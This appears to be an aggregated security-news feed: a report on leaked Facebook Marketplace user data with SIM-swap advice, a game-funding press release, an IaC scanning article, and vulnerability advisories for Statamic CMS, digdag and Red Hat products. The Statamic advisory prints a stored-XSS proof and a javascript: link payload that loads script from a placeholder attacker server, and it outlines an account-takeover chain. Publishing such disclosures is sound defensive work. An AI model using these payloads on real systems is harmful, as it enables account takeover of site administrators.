Personal data belonging to 200,000 Facebook Marketplace users has been published online, including email addresses and phone numbers.

Personal data belonging to Facebook Marketplace users has been published online, according to BleepingComputer.

A cybercriminal was allegedly able to steal a partial database after hacking the systems of a Meta contractor.

The leak consists of around 200,000 records that contain names, phone numbers, email addresses, Facebook IDs, and Facebook profile information of the affected Facebook Marketplace users. BleepingComputer was able to verify the some of the data.

Marketplace was introduced by Facebook in 2016 and quickly became a popular platform to sell items to local buyers. It’s often preferred over other marketplaces because you can find or sell items locally that would be too expensive to ship, but you can easily pick up yourself.

Smaller businesses also use it as well to get their ecommerce side of the business started. Statistics say that every month, on average 40% of Facebook users are Marketplace users, and an estimated 485 million or 16% of active users log in to Facebook for the sole purpose of shopping on Facebook Marketplace.

Depending on the buyer of the leaked data, both the email addresses and the phone numbers could be used in phishing attacks. Phishing is the art of sending an email with the aim of getting users to open a malicious file or click on a link to then steal credentials. The combination of email addresses and phone numbers could also be used in SIM swapping attacks.

SIM swapping, also known as SIM jacking, is the act of illegally taking over a target’s cell phone number. This can be done in a number of ways, but one of the most common methods involves tricking the target’s phone carrier into porting the phone number to a new SIM which is under the control of the attacker. Having control over or access to the victim’s email combined with the knowledge of the associated phone number makes a SIM swap relatively easy.

**Protect yourself from a SIM card swap attack**

*   **Don’t reply to calls, emails, or text messages that request personal information.** Should you get a request for your account or personal information, contact the company asking for it by using a phone number or website that you know is real.
*   **Limit the personal information you share online.**
*   **Set up a PIN or password on your cellular account.** This could help protect your account from unauthorized changes. Check your provider’s website for information on how to do this.
*   **Use Multi-Factor Authentication (MFA), especially on accounts with sensitive personal or financial information.** If you do use MFA, keep in mind that text message verification may not stop a SIM card swap. If you’re concerned about SIM card swapping, use an authentication app or a security key.

If you want to find out how much of your own data is exposed online, you can try our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using Malwarebytes Identity Theft Protection.

 Facebook Marketplace users’ stolen data offered for sale 

By Owais Sultan
Debut Title Overworld Designed Around Multiplayer Role-Playing Action.
This is a post from HackRead.com Read the original post: Overworld secures $10M for cross-platform ARPG development

**LOS ANGELES – Feb. 14, 2024 –** Game studio Overworld, building high-quality, cross-platform multiplayer RPGs, has closed a seed round of $10M, led by Hashed alongside The Spartan Group, Sanctor Capital and Galaxy Interactive, with notable participation from Hashkey, Big Brain Holdings and Foresight Ventures, to accelerate development on a multiplayer role-playing experience enhanced with digital collectables.

Codenamed _Overworld_, the rich, cross-platform fantasy universe has been in development for nearly a year at its namesake studio. The Xterio ecosystem incubated the project by providing initial funding and tech contributions and is committed to supporting the project through its development, notably as it leverages digital ownership to fuel its growth and expand its community further.

_Overworld,_ a third-person 3D action role-playing game developed with Unreal Engine 5, brings players together in a universe that blends high fantasy lore with anime-inspired characters and designs in a compelling storyline that focuses on mixing epic-scale stakes with day-to-day relatable stories. The team is currently focused on developing an alpha build for current-gen consoles, PCs and mobile devices.  

_Overworld_ aims at delivering an experience that competes with best-in-class RPGs with compelling game design and world-class visual quality while implementing player ownership in a frictionless and optional way that adds to the experience – rather than relying on it as the primary feature to build the game on top of.

Overseeing _Overworld_’s development is Jeremy Horn, Xterio’s COO, who has an extensive career in games, technology, and entertainment. Formerly Vice President of Strategy at Jam City, Horn is a games industry veteran with deep expertise in developing and sustaining top-grossing social games spanning new and existing IP.  The team comprises proven hit-makers who worked with Epic, EA, Sony, Bioware, Jam City and Ubisoft. 

“At Overworld, we are focused on building an incredible, dynamic game world driven by the player community,” said Horn. “The massive scale of _Overworld_ represents the scale of our ambitions as a game studio. In just one year, we’ve seen our player community embrace our first collection of digital collectables, and we are excited to build out even more of this novel world.” 

_Overworld_ will be published by Xterio, based on the games platform tech of the Xterio Foundation, which is backed by top-grossing mobile developers, including FunPlus. Xterio focuses on infusing F2P and cross-platform games with digital collectables.

_Overworld’_s recent NFT collection, “Overworld Incarna,” is one of the most successful collections of 2023 in revenue, volume, market value, and marketing reach. Overworld Incarna has been in the top ten traded collections for over five weeks and remains one of the most traded game-themed collections.

“_Overworld_, the flagship social RPG from the established Xterio platform, is poised to redefine online multiplayer RPGs in the crypto space by targeting the masses. With a strong leader who understands the dynamics of web3 and backed by an experienced team with a strong track record, _Overworld_ is poised for success in the web3 gaming space,” said Ryan Kim, Founding Partner, Hashed. “With a user-driven economy and unparalleled industry expertise at the right time, _Overworld_ is poised for innovation and resilience.”

****About Overworld****

Overworld is a world-class game development studio building cross-platform free-to-play games built around player ownership. A proven team of free-to-play hit-makers leads the team. To learn more about Overworld, please follow along @OverworldPlay and at overworld.games. 

****About Xterio****

Xterio Foundation in Switzerland was founded with a Council and a team of technology and entertainment leaders with deep free-to-play games experience, on a mission to provide the platform technology and ecosystem enabling the development, publishing, and distribution of high-quality Web2 and Web3 games and interactive entertainment.

Xterio Labs Limited in Hong Kong has a team of technology and entertainment leaders with deep free-to-play games experience operating the Xterio Platform including various services relating to the publishing and distribution of high-quality Web2 and Web3 games and interactive entertainment.  To learn more, please visit xter.io, and follow along at Discord and @XterioGames.

****Press Contact****

*   Sibel Sunar
*   \[email protected\] 
*   Fortyseven communications for Xterio

1.  **What is Blockchain Gaming and its Play-to-Earn Model?**
2.  **The Rise of Blockchain Gaming and Secure Marketplaces**
3.  **Metaverse is connected to crypto – but not so much to Bitcoin**

Overworld secures $10M for cross-platform ARPG development

By Uzair Amir
Infrastructure-as-code (IaC) continues to gain traction and is even hailed for having changed software development towards greater efficiency…
This is a post from HackRead.com Read the original post: 5 Ways to Maximize the Impact of IaC Scans

Infrastructure-as-code (IaC) continues to gain traction and is even hailed for having changed software development towards greater efficiency and shared responsibilities between the development and operations teams. It is revolutionizing modern IT, especially given the growing prominence of cloud computing.

Simply switching to IaC, however, does not automatically result in benefits, given the rampancy of security vulnerabilities and cyber attacks designed to exploit IaC issues. That’s why it’s crucial to scan your IaC code for possible security vulnerabilities. Organizations that embrace Infrastructure-as-Code need thorough scanning to ensure that the code works as intended and has no issues that can enable or facilitate cyber attacks.

Here are a few ways to maximize the sought-after benefits of IaC scans and ensure that adopting code-based management and provisioning of infrastructure does not become an additional security challenge.

****Integrating Security into CI/CD Pipelines****

One of the most important steps in ensuring that whichever IaC scanning solutions you use are optimized to deliver the best outcomes is to integrate them with your continuous integration and continuous deployment (CI/CD) pipelines. As organizations adopt DevOps, it only makes sense to incorporate security mechanisms into CI/CD.

This integration enables the following key benefits: the early detection of vulnerabilities, minimizing lag times in the feedback loop, the consistent enforcement of security policies, and continuous security monitoring. Merging security with your CI/CD pipelines propagates the enforcement of security measures and the impact of security controls on the same areas the CI/CD pipelines reach. This eliminates the need to painstakingly identify the coverage of security solutions and configure tools accordingly.

Additionally, having the policy of integrating security and CI/CD pipelines supports collaboration between DevOps and security teams. This makes it inevitable for security, development, and operations teams to proactively work together to configure infrastructure efficiently and securely and address challenges together.

****Continuous Scanning****

Cybersecurity pundits often include continuous security validation in their recommendations to ensure protection against cyber threats. This extends to the security of IaC.

Given the growing aggressiveness and sophistication of cyber attacks, it is not enough to rely on periodic or regular checks. Cybercriminals are getting faster at exploiting security vulnerabilities. Leaving any window of opportunity for attacks to happen can lead to disastrous consequences.

It is advisable to employ automated IaC scanning tools to make sure that vulnerabilities are spotted and addressed as promptly as possible. These tools can continuously examine code repositories, configuration files, as well as deployment scripts to detect possible security issues and bring them to light for appropriate action – before cybercriminals discover and take advantage of them.

****Adhering to Compliance Requirements****

Some might see this advice as hackneyed and ambiguous, but it is important to emphasize the value of best practices and complying with cybersecurity regulations. If the idea of best practices sounds vague, it helps to turn to authoritative cybersecurity information sources like the OWASP IaC security cheat sheet. There are many sources of useful cybersecurity guides and insights to make Infrastructure-as-Code secure and reliable.

When it comes to cybersecurity regulations, none directly target IaC practices. However, IaC management is indirectly covered by existing regulations such as the Payment Card Industry Data Security Standard (PCI DSS) and the General Data Protection Regulation (GDPR) that impose requirements on having security controls over infrastructure components configured and managed via IaC.

IaC scanning tools that do not have features which align with the standards described in best practices and regulatory requirements are not worth using. If these tools have the necessary functions, it is also important to properly configure or activate them in line with what best practices and regulations indicate.

****Prioritizing Remediation****

Current technologies afford the ability to conduct continuous security scanning and address some issues automatically. However, not all issues can be properly remedied automatically. Human involvement is still required to resolve complex concerns detected in your IaC code. IaC tools can raise an endless deluge of vulnerability alerts or notifications, but it’s up to the humans overseeing the security scanning to keep up.

As such, it is important to come up with a sensible prioritization plan. Some tools provide risk-based scoring systems to make it easier for people to address the most urgent issues. These are highly useful to avoid getting overwhelmed by the problem of information overload that is common in cybersecurity tools.

Take note that it is inadvisable to rely entirely on the IaC testing tools when it comes to identifying critical assets and resources. Proper and purposeful configuration is a must, and it may be necessary to seek the assistance of outside cybersecurity experts when doing this.

****Addressing the Human Weakness****

People continue to be the biggest weakness when it comes to cybersecurity. Highly sophisticated scanning solutions are essentially useless if those responsible for evaluating and managing IaC security are not well-versed with the appropriate courses of action to take. Also, without proper configuration, the best IaC scanning solutions are unlikely to provide the expected outcomes.

Hence, it is essential to invest in cybersecurity training to empower teams with the right skills and knowledge for effective security management in the context of IaC environments. Infrastructure as code engineers usually have some background in cybersecurity, but not many of them have the expertise needed, especially when it comes to the most recent threats and concerted attacks.

Development and operations teams should work together with security professionals to implement secure coding practices and formulate IaC security guidelines that address the specific needs of an organization. This collaboration helps enable more effective threat detection by fostering a culture of security awareness.

****In Summary****

Maximizing the impact of IaC scans entails the use of the right tools and people overseeing these tools with the necessary knowledge and insights. IaC scanning tools should be capable of continuous scanning, integration with CI/CD pipelines, and providing risk-based scoring systems for remediation prioritization. They should also align with best practices and regulations.

At the same time, the teams using these tools should take full advantage of their functions and have enough cybersecurity savvy and experience, which can be achieved with cybersecurity training and collaboration among the development, operations, and security teams.

1.  **The Best Ways to Automate SBOM Creation**
2.  **ARMO integrates ChatGPT to secure Kubernetes**
3.  **Kotlin app development company – How to choose**
4.  **Automated API Testing Differs from Manual API Testing**
5.  **What Are the Security Benefits of Using a Digital Signature?**

5 Ways to Maximize the Impact of IaC Scans

Statamic CMS versions prior to 4.46.0 and 3.4.17 suffer from multiple persistent cross site scripting vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20240212-0 >  
=======================================================================  
               title: Multiple Stored Cross-Site Scripting vulnerabilities  
             product: Statamic CMS  
  vulnerable version: <4.46.0, <3.4.17  
       fixed version: >=4.46.0, >=3.4.17  
          CVE number: CVE-2024-24570  
              impact: high  
            homepage: https://statamic.com/  
               found: 2024-01-06  
                  by: Niklas Schilling (Office Munich)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Statamic is a modern, clean, and highly adaptable CMS built on Laravel  
that can run full-stack, headless, on flat files or databases, or as a  
static site generator."

Source: https://statamic.com/

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately. Furthermore,  
an updated guideline for implementing a Content Security Policy (CSP) is  
provided by the vendor.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Stored Cross-Site Scripting in Forms feature (CVE-2024-24570)  
Statamic's Forms feature allows unauthenticated users to upload certain  
filetypes. While only a limited number of file extensions are allowed, it's  
possible to bypass these restrictions to upload an HTML file containing  
JavaScript code.

2) Stored Cross-Site Scripting in Link Field  
Statamic's Link Field feature provides authenticated users a convenient way  
of inserting Hyperlinks into a collection's entry. It was identified that  
it's possible to execute JavaScript code upon clicking on a specially  
crafted Hyperlink.

Proof of concept:  
-----------------  
1) Stored Cross-Site Scripting in Forms feature (CVE-2024-24570)  
When trying to upload an HTML file as an unauthenticated user, the  
.html extension gets correctly detected by Statamic, leading to the file  
being blocked from uploading.

This check can be bypassed though, by instead using a .jpg file extension,  
as files of this type are allowed to be uploaded. Afterwards, the file's  
content is analyzed by Statamic and correctly interpreted as HTML, resulting  
in the initial .jpg extension being replaced with an .html extension. As no  
checks on this newly set file extension are performed, the file is now shown  
as a valid submission in Statamic's "Forms" page.

If an authenticated user accesses this submission, the included JavaScript  
code will be executed. This can be verified by uploading a file called  
"test.jpg" with the following content:

<!DOCTYPE html>  
<html>  
     <body>  
         <script>alert("Stored XSS on "+window.origin)</script>  
     </body>  
</html>

To further demonstrate the criticality of this vulnerability, the following  
JavaScript code can be used:

[ POC code removed from public advisory ]

When an admin user now accesses this JavaScript submission, the following happens:  
1. Load the "Users" page in a hidden iframe and extract the CSRF token from it.  
2. Request user information and extract the user ID and email address from  
    the response.  
3. Request a password reset code for the extracted used ID.  
4. Extract the password reset code from the response and send it to the  
    attacker server including the user's email address.

After receiving the victim's password reset code and email address,  
the attacker can now visit the following URL and set a new password:  
https://<STATAMIC_SERVER>/!/auth/password/reset/<PASSWORD_RESET_CODE>

This results in a successful takeover of the victim's account.

2) Stored Cross-Site Scripting in Link Field  
When using a Link Field of type "URL", the following XSS payload can be used  
as input:  
javascript:var js=document.createElement('script');js.src='https://<ATTACKER_SERVER>/poc.js';document.body.append(js)

As this input is typically placed in the "href" attribute of an anchor tag,  
the JavaScript pseudo protocol can be used to execute arbitrary JavaScript  
code upon clicking on the Hyperlink. In this case the external file "poc.js"  
will be loaded, which contains the JavaScript code from the password reset  
code stealer above (removed from public advisory).

This way, an authenticated user with lower privileges can gain control over an  
admin's account after the admin clicks on the malicious Hyperlink.

Statamic's "sanitize" modifier doesn't prevent this attack, as no illegal  
characters are being used in the XSS payload:  
<a href="{{ url_link | sanitize }}">Link</a>

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested which was the latest version available  
at the time of the test:  
* 4.45.0

The following Statamic CMS versions are affected by this vulnerability:  
* <4.46.0  
* <3.4.17

Vendor contact timeline:  
------------------------  
2024-01-24: Contacting vendor through support@statamic.com  
2024-01-24: Vendor confirms receipt of advisory and states that they aim to  
             resolve the issues within the next few days.  
2024-01-26: Vendor fixes the first stored XSS and shares the corresponding  
             GitHub security advisory draft. Furthermore, valid arguments for  
             mitigating the second stored XSS via a correctly set CSP are  
             supplied. Vendor also creates a new documentation page for  
             setting the CSP in the correct areas.  
2024-01-26: Confirming that setting a correctly configured CSP for the  
             necessary areas results in a higher efficiency in mitigating the  
             second security issue.  
2024-01-29: Suggesting an adjustment of the assigned CVSS3.1 score that was  
             set in the vendor's GitHub security advisory. Also asking for  
             planned public disclosure and the assignment of a CVE number.  
2024-01-29: Vendor adjusts CVSS3.1 score and suggests requesting a  
             CVE number via GitHub.  
2024-01-30: Received CVE number CVE-2024-24570.  
2024-02-12: Coordinated release of advisory.

Solution:  
---------  
The vendor provided a patch for the "Stored Cross-Site Scripting in Forms" feature  
(CVE-2024-24570):

* Update version "4.X" to "4.46.0" or later  
* Update version "3.X" to "3.4.17" or later

Get the newest release of Statamic CMS here:  
https://github.com/statamic/cms/releases

The vendor will not provide a patch regarding "Stored Cross-Site Scripting in  
Link Field" but suggests to implement a correctly configured CSP as described  
in Statamic's newly added documentation page:

https://statamic.dev/tips/content-security-policy

Vendor advisory:  
https://github.com/statamic/cms/security/advisories/GHSA-vqxq-hvxw-9mv9

Workaround:  
-----------  
No workaround available.

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Niklas Schilling / @2024

Statamic CMS Cross Site Scripting

### Summary

Treasure Data's digdag workload automation system is susceptible to a path traversal vulnerability if it's configured to store log files locally.

### Impact

This issue may lead to Information Disclosure.


Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-25125

**Absolute path traversal vulnerability in digdag server**

Moderate severity GitHub Reviewed Published Feb 14, 2024 in treasure-data/digdag • Updated Feb 14, 2024

**Package**

maven io.digdag:digdag-server (Maven)

**Affected versions**

< 0.10.5.1

**Patched versions**

0.10.5.1

**Description**

**Summary**

Treasure Data's digdag workload automation system is susceptible to a path traversal vulnerability if it's configured to store log files locally.

**Impact**

This issue may lead to Information Disclosure.

**References**

*   GHSA-5mp4-32rr-v3x5
*   treasure-data/digdag@eae89b0

Published to the GitHub Advisory Database

Feb 14, 2024

Last updated

Feb 14, 2024

GHSA-5mp4-32rr-v3x5: Absolute path traversal vulnerability in digdag server

Red Hat Security Advisory 2024-0801-03 - A new image is available for Red Hat Single Sign-On 7.6.7, running on OpenShift Container Platform 3.10 and 3.11, and 4.3. Issues addressed include bypass, cross site scripting, and open redirection vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0801.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat Single Sign-On 7.6.7 for OpenShift image enhancement updateAdvisory ID:        RHSA-2024:0801-03Product:            Red Hat OpenShift EnterpriseAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0801Issue date:         2024-02-14Revision:           03CVE Names:          CVE-2023-2976====================================================================Summary: A new image is available for Red Hat Single Sign-On 7.6.7, running on OpenShift Container Platform 3.10 and 3.11, and 4.3.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Single Sign-On is an integrated sign-on solution, available as aRed Hat JBoss Middleware for OpenShift containerized image. The Red HatSingle Sign-On for OpenShift image provides an authentication server thatyou can use to log in centrally, log out, and register. You can also manageuser accounts for web applications, mobile applications, and RESTful webservices.Security Fix(es):* redirect_uri validation logic that allows for a bypass of otherwise explicitly allowed hosts (CVE-2023-6291)* guava: insecure temporary directory creation (CVE-2023-2976)* jetty-server: OutOfMemoryError for large multipart without filename read via request.getParameter() (CVE-2023-26048)* jetty-server: Cookie parsing of quoted values can exfiltrate values from other cookies (CVE-2023-26049)* reflected XSS via wildcard in OIDC redirect_uri (CVE-2023-6134)* open redirect via \"form_post.jwt\" JARM response mode (CVE-2023-6927)* santuario: Private Key disclosure in debug-log output (CVE-2023-44483)* Log Injection during WebAuthn authentication or registration (CVE-2023-6484)This erratum releases a new image for Red Hat Single Sign-On 7.6.7 for use within the OpenShift Container Platform 3.10, OpenShift Container Platform3.11, and within the OpenShift Container Platform 4.3 cloud computing Platform-as-a-Service (PaaS) for on-premise or private cloud deployments, aligning with the standalone product release.Solution:https://raw.githubusercontent.com/jboss-container-images/redhat-sso-7-openshift-image/v7.6.7.GA/templates/${resource}CVEs:CVE-2023-2976References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2215229https://bugzilla.redhat.com/show_bug.cgi?id=2236340https://bugzilla.redhat.com/show_bug.cgi?id=2236341https://bugzilla.redhat.com/show_bug.cgi?id=2246070https://bugzilla.redhat.com/show_bug.cgi?id=2248423https://bugzilla.redhat.com/show_bug.cgi?id=2249673https://bugzilla.redhat.com/show_bug.cgi?id=2251407https://bugzilla.redhat.com/show_bug.cgi?id=2255027

Red Hat Security Advisory 2024-0801-03

Red Hat Security Advisory 2024-0741-03 - Red Hat OpenShift Container Platform release 4.13.33 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include denial of service and traversal vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0741.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Critical: OpenShift Container Platform 4.13.33 bug fix and security update  
Advisory ID:        RHSA-2024:0741-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0741  
Issue date:         2024-02-14  
Revision:           03  
CVE Names:          CVE-2022-3064  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.13.33 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.13.

Red Hat Product Security has rated this update as having a security impact of  Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.13.33. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHBA-2024:0743

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

Security Fix(es):

* go-git: Maliciously crafted Git server replies can lead to path traversal  
and RCE on go-git clients (CVE-2023-49569)  
* go-yaml: Improve heuristics preventing CPU/memory abuse by parsing  
malicious or large YAML documents (CVE-2022-3064)  
* golang: net/http, x/net/http2: rapid stream resets can cause excessive  
work (CVE-2023-44487) (CVE-2023-39325)  
* go-git: Maliciously crafted Git server replies can cause DoS on go-git  
clients (CVE-2023-49568)  
* opentelemetry-go-contrib: DoS vulnerability in otelgrpc due to unbound  
cardinality metrics (CVE-2023-47108)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.13 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

Solution:

CVEs:

CVE-2022-3064

References:

https://access.redhat.com/security/updates/classification/#critical  
https://bugzilla.redhat.com/show_bug.cgi?id=2163037  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296  
https://bugzilla.redhat.com/show_bug.cgi?id=2251198  
https://bugzilla.redhat.com/show_bug.cgi?id=2258143  
https://bugzilla.redhat.com/show_bug.cgi?id=2258165  
https://issues.redhat.com/browse/OCPBUGS-24661  
https://issues.redhat.com/browse/OCPBUGS-25611  
https://issues.redhat.com/browse/OCPBUGS-25805  
https://issues.redhat.com/browse/OCPBUGS-26508  
https://issues.redhat.com/browse/OCPBUGS-28205  
https://issues.redhat.com/browse/OCPBUGS-28208  
https://issues.redhat.com/browse/OCPBUGS-28777  
https://issues.redhat.com/browse/OCPBUGS-28953  
https://issues.redhat.com/browse/OCPBUGS-28958  
https://issues.redhat.com/browse/OCPBUGS-28979  
https://issues.redhat.com/browse/OCPBUGS-29151  
https://issues.redhat.com/browse/OCPBUGS-6236  
https://issues.redhat.com/browse/OCPBUGS-8343

Red Hat Security Advisory 2024-0741-03

Red Hat Security Advisory 2024-0740-03 - Red Hat OpenShift Container Platform release 4.13.33 is now available with updates to packages and images that fix several bugs. Issues addressed include denial of service and traversal vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0740.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Critical: OpenShift Container Platform 4.13.33 security and extras update  
Advisory ID:        RHSA-2024:0740-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0740  
Issue date:         2024-02-14  
Revision:           03  
CVE Names:          CVE-2023-49568  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.13.33 is now available with updates to packages and images that fix several bugs.

This release includes a security update for Red Hat OpenShift Container Platform 4.13.

Red Hat Product Security has rated this update as having a security impact of  Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.13.33. See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHSA-2024:0741

Security Fix(es):

* go-git: Maliciously crafted Git server replies can lead to path traversal  
and RCE on go-git clients (CVE-2023-49569)  
* go-git: Maliciously crafted Git server replies can cause DoS on go-git  
clients (CVE-2023-49568)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.13 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

CVEs:

CVE-2023-49568

References:

https://access.redhat.com/security/updates/classification/#critical  
https://bugzilla.redhat.com/show_bug.cgi?id=2258143  
https://bugzilla.redhat.com/show_bug.cgi?id=2258165

Red Hat Security Advisory 2024-0740-03

Red Hat Security Advisory 2024-0735-03 - Red Hat OpenShift Container Platform release 4.14.12 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include denial of service and traversal vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0735.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Critical: OpenShift Container Platform 4.14.12 bug fix and security update  
Advisory ID:        RHSA-2024:0735-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0735  
Issue date:         2024-02-14  
Revision:           03  
CVE Names:          CVE-2022-21708  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.14.12 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.14.

Red Hat Product Security has rated this update as having a security impact  
of Critical. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.14.12. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHBA-2024:0738

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.14/release_notes/ocp-4-14-release-notes.html

Security Fix(es):

* go-git: Maliciously crafted Git server replies can lead to path traversal  
and RCE on go-git clients (CVE-2023-49569)  
* go-git: Maliciously crafted Git server replies can cause DoS on go-git  
clients (CVE-2023-49568)  
* graphql-go: Denial of service via stack overflow panics (CVE-2022-21708)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  
All OpenShift Container Platform 4.14 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.14/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2022-21708

References:

https://access.redhat.com/security/updates/classification/#critical  
